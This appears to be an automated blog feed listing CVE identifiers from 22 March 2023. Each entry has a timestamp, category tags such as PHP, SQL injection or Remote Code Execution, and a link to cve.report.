2023-03-22 16:00:02.864219 (Remote Attack) CVE-2023-25591 https://cve.report/CVE-2023-25591
2023-03-22 16:00:02.864848 (Remote Attack) CVE-2023-25589 https://cve.report/CVE-2023-25589
2023-03-22 16:00:02.865626 (GitHub) CVE-2023-1370 https://cve.report/CVE-2023-1370
2023-03-22 16:00:02.866208 (Remote Code Execution) CVE-2023-1168 https://cve.report/CVE-2023-1168
2023-03-22 21:00:02.088191 (Apache Tomcat) CVE-2023-28708 https://cve.report/CVE-2023-28708
2023-03-22 21:00:02.088888 (PHP, Critical, File Upload) CVE-2023-1558 https://cve.report/CVE-2023-1558
2023-03-22 21:00:02.089496 (PHP, Critical) CVE-2023-1557 https://cve.report/CVE-2023-1557
2023-03-22 21:00:02.090121 (PHP, SQL injection, Critical) CVE-2023-1556 https://cve.report/CVE-2023-1556
2023-03-22 22:00:02.340122 (PHP, Critical) CVE-2023-1561 https://cve.report/CVE-2023-1561
2023-03-22 22:00:02.340999 (PHP) CVE-2023-1559 https://cve.report/CVE-2023-1559
2023-03-22 23:00:02.736658 (SQL injection) CVE-2023-27638 https://cve.report/CVE-2023-27638
2023-03-22 23:00:02.737373 (PHP, SQL injection) CVE-2023-27637 https://cve.report/CVE-2023-27637
2023-03-22 23:00:02.738347 (PHP, SQL injection, Critical) CVE-2023-1564 https://cve.report/CVE-2023-1564
2023-03-22 23:00:02.739306 (PHP, SQL injection, Critical) CVE-2023-1563 https://cve.report/CVE-2023-1563
반응형

+ Recent posts